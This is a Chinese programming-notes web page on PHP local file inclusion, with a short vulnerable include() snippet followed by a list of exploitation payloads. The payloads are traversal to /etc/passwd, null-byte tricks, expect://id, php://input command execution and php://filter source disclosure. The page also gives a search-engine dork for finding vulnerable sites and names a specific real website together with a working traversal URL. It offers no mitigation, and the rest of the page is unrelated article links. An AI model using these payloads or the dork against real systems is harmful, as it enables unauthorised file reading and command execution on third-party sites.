当前位置: 开发笔记 > 编程语言 > 正文

LFI（localfileinclusionvulnerability）本地文件包含

作者：姚威阳_489 | 来源：互联网 | 2024-09-25 13:16

代码实例：<?php$file$_GET[file];if(isset($file)){include(pages$file);}else{i

代码实例：

$file = $_GET['file'];

if(isset($file))

{

include("pages/$file");

}

else

{

include("index.php");

}

利用方式：

/script.php?page=../../../../../etc/passwd

php?page=expect://id

?page=/etc/passwd%00

?page=/etc/passwd%2500

warpper://target

?page=php://input&cmd=ls

page=php://filter/convert.base64-encode/resource=

google hacking

inurl:index.php?page=

vulnerable website：

http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd

推荐阅读

base64
六十五、主动模式和被动模式、添加监控主机、添加自定义模板、处理图形中的乱码、自动发现...

六十五、主动模式和被动模式、添加监控主机、添加自定义模板、处理图形中的乱码、自动发现一、主动模式和被动模式主动或者被动是相对客户端来讲的被动模式，服务端会主动连接客户 ... [详细]

蜡笔小新 2024-09-24 17:27:19
base64
ASP.NET使用Ajax如何返回Json对象的示例方法介绍

这篇文章主要介绍了ASP.NET使用Ajax返回Json对象的方法，非常不错，具有参考借鉴价值,需要的朋友可以参考下一、 ... [详细]

蜡笔小新 2024-09-25 16:26:23
client
利用原始socket简单实现FTP的客户端和服务器端程序

1.设计目的本设计旨在利用原始socket简单实现FTP(FileTransferProtocol,文件传输协议)的客户端和服务器端程序，能够实现get、put、pwd、dir、cd等基 ... [详细]

蜡笔小新 2024-09-25 11:05:14
cmd
ASP.NETCoreZero笔记(PowerTools)

安装ASP.NETCoreZeroPowerTool根据官方的介绍,使用该工具,可以快速得创建具备单个表结构及父子表结构的服务以及前端页面。服务:指的是生产对应基础功能webApi ... [详细]

蜡笔小新 2024-09-24 19:25:15
utf-8
linux 下打造自己的 Python IDE

闲话少说，直接切入主题，之前也是用一下其他的IDE，但是总是在vi和IDE之间来回切换，比较麻烦，于是乎，找了几个插件亲身体验，功能挺不错；1、安装vi7.0vim的官方网站是：www.vmuni ... [详细]

蜡笔小新 2024-09-24 18:24:55
require
由浅入深剖析序列化攻击（一）

近期因为内部培训有序列化的需求，于是趁此机会由浅入深的剖析一下序列化相关内容。之前也写过由浅入深的xml漏洞系列，欢迎阅读：https:skysec.top20180817浅析xml及其安全问题 ... [详细]

蜡笔小新 2024-09-24 17:44:21
require
mysql服务器无法启动MAMP

我在这里读了一些答案,说当您的mysql服务器无法在MAMP中启动时,您应该运行sudokillall-9mysqld我过去曾经使用过它,但它一直有效,但是由于某种原因,这次它不起 ... [详细]

蜡笔小新 2024-09-24 17:33:37
main
自定义_自定义AXIIP核（转）

本文由编程笔记#小编为大家整理，主要介绍了自定义AXI-IP核（转）相关的知识，希望对你有一定的参考价值。 ... [详细]

蜡笔小新 2024-09-24 17:31:01
cmd
如何在Windows环境下配置php+apache环境

本文介绍了在Windows环境下如何配置php+apache环境，包括下载php7和apache2.4、安装vc2015运行时环境、启动php7和apache2.4等步骤。希望对需要搭建php7环境的读者有一定的参考价值。摘要长度为169字。 ... [详细]

蜡笔小新 2023-12-13 10:39:24
less
搜索+剪枝 POJ 1416 Shredding Company

POJ1416ShreddingCompanyTimeLimit: 1000MSMemoryLimit: 10000KTotalSubmissions: 5231Accepted: ... [详细]

蜡笔小新 2024-09-24 19:49:56
main
开发笔记:OpenCV基础图形绘制

本文由编程笔记#小编为大家整理，主要介绍了OpenCV基础---图形绘制相关的知识，希望对你有一定的参考价值。图形绘制OpenCV提供了直线，矩形，圆 ... [详细]

蜡笔小新 2024-09-24 17:41:23
main
SQLPLUS 命令

定制：sql提示符信息1、显示SQLPLUS帮助，命令如下：HELPINDEX@COPYPAUSESHUTDOWN@@DEFINEPRINTSPOOLDELPR ... [详细]

蜡笔小新 2024-09-24 17:37:23
format
VScode格式化文档换行或不换行的设置方法

本文介绍了在VScode中设置格式化文档换行或不换行的方法，包括使用插件和修改settings.json文件的内容。详细步骤为：找到settings.json文件，将其中的代码替换为指定的代码。 ... [详细]

蜡笔小新 2023-12-14 17:15:38
less
Webpack5内置处理图片资源的配置方法

本文介绍了在Webpack5中处理图片资源的配置方法。在Webpack4中，我们需要使用file-loader和url-loader来处理图片资源，但是在Webpack5中，这两个Loader的功能已经被内置到Webpack中，我们只需要简单配置即可实现图片资源的处理。本文还介绍了一些常用的配置方法，如匹配不同类型的图片文件、设置输出路径等。通过本文的学习，读者可以快速掌握Webpack5处理图片资源的方法。 ... [详细]

蜡笔小新 2023-12-14 15:39:51
main
九度OnlineJudge之1002：Grading问题的解决方法

本文介绍了九度OnlineJudge中的1002题目“Grading”的解决方法。该题目要求设计一个公平的评分过程，将每个考题分配给3个独立的专家，如果他们的评分不一致，则需要请一位裁判做出最终决定。文章详细描述了评分规则，并给出了解决该问题的程序。 ... [详细]

蜡笔小新 2023-12-14 13:00:09

姚威阳_489

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章